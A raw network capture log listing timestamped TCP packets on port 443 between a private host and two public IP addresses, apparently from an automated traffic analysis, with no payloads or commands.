                                                                                                                                                                        Nov 24, 2024 05:12:09.410206079 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.410213947 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.503567934 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.503633022 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.503684998 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:12:09.634326935 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.637403011 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.637454987 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.637501955 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.637543917 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.637624025 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.637639046 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.637648106 CET49854443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.637651920 CET4434985413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.641140938 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.641185999 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.641258955 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.641415119 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.641427040 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.733037949 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:12:09.733069897 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.834079027 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.837169886 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.837235928 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.837235928 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.837280989 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.840606928 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.840632915 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.840671062 CET49856443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.840677977 CET4434985613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.842997074 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.846296072 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.846369028 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.846482038 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.846502066 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.846513987 CET49857443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.846522093 CET4434985713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.852602005 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.852636099 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.852709055 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.853929996 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.853970051 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.854038954 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.854289055 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.854305983 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:09.855477095 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:09.855493069 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.076859951 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.077183962 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.077198029 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.077682018 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.078035116 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.078114986 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.078222990 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.112843990 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.115992069 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.116054058 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.116195917 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.116216898 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.116228104 CET49855443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.116235018 CET4434985513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.121332884 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.121362925 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.121423960 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.121567965 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.121583939 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.123336077 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.573909998 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.573939085 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.573960066 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.574014902 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.574034929 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.574054956 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.574080944 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.765074968 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.765105963 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.765214920 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.765233040 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.765279055 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.802963018 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.803019047 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.803070068 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.803095102 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.803123951 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.803133011 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.938404083 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.938438892 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.938505888 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.938524008 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.938563108 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.938577890 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.967462063 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.967489004 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.967561007 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.967572927 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.967608929 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.967628002 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.988569975 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.988601923 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.988658905 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.988671064 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:10.988684893 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:10.988718033 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.008382082 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.008413076 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.008491993 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.008502007 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.008547068 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.111288071 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.133177042 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.133205891 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.133754015 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.133764029 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.137440920 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.137469053 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.137651920 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.137676001 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.137725115 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.152590036 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.152617931 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.152666092 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.152673960 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.152714014 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.152725935 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.165594101 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.165694952 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.165807009 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.165870905 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.179533005 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.179559946 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.179722071 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.179759026 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.179806948 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.190938950 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.190973043 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.191020012 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.191032887 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.191060066 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.191072941 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.198342085 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.198409081 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.198431015 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.198431015 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.198491096 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.424484968 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.474917889 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.487215042 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.487224102 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.488030910 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.488037109 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.507544994 CET49869443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.507569075 CET4434986913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.545357943 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.548466921 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.548527956 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.548742056 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.548754930 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.548767090 CET49872443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.548774004 CET4434987213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.558147907 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.558172941 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.558242083 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.561570883 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.561578989 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.574460983 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.584916115 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.584953070 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.585410118 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.585418940 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.632707119 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.633672953 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.633691072 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.634293079 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.634300947 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.876236916 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.879291058 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.879456997 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.879456997 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.879456997 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.883383989 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.883439064 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.883527994 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.883781910 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.883804083 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.936078072 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.936614990 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.936650038 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:11.937083960 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:11.937088966 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.009155989 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.009232044 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.009272099 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.009958982 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.009975910 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.009984970 CET49879443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.009990931 CET4434987913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.013777971 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.013822079 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.013883114 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.014123917 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.014137030 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.075588942 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.078973055 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.079026937 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.079031944 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.079072952 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.079144955 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.079158068 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.079171896 CET49878443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.079176903 CET4434987813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.082387924 CET49901443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.082422972 CET4434990113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.082490921 CET49901443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.082668066 CET49901443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.082683086 CET4434990113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.179893970 CET49873443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.179924011 CET4434987313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.439704895 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.439779997 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.440057993 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.440207958 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.440226078 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.440237045 CET49885443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.440246105 CET4434988513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.444861889 CET49907443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.444892883 CET4434990713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.444966078 CET49907443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.445164919 CET49907443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:12.445173979 CET4434990713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.454060078 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.454859972 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.454885006 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.455593109 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.455601931 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.685987949 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.728511095 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.759015083 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.759036064 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.759547949 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.759553909 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.773015976 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.776731968 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.776768923 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.777249098 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.777254105 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.923988104 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.924052954 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:13.924140930 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:13.971276045 CET4434990113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.022552013 CET49901443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.129925013 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.133073092 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.133126020 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.133133888 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.133176088 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.207031012 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.210091114 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.210182905 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.229417086 CET4434990713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.282751083 CET49907443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.315217018 CET49907443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.315228939 CET4434990713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.315886021 CET49907443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.315892935 CET4434990713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.316422939 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.316458941 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.316476107 CET49890443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.316482067 CET4434989013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.316662073 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.316692114 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.316704035 CET49899443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.316711903 CET4434989913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.324561119 CET49901443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.324583054 CET4434990113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.325442076 CET49901443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.325448036 CET4434990113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.337708950 CET49895443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.337738037 CET4434989513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.454515934 CET49923443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.454541922 CET4434992313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.454611063 CET49923443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.456340075 CET49924443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.456371069 CET4434992413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.456418991 CET49924443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.463637114 CET49925443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.463664055 CET4434992513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.463723898 CET49925443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.464653015 CET49923443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.464667082 CET4434992313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.464977980 CET49924443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.464994907 CET4434992413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.465416908 CET49925443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:14.465430975 CET4434992513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.658902884 CET4434990113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.662017107 CET4434990113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:14.662091970 CET49901443192.168.2.713.107.246.63
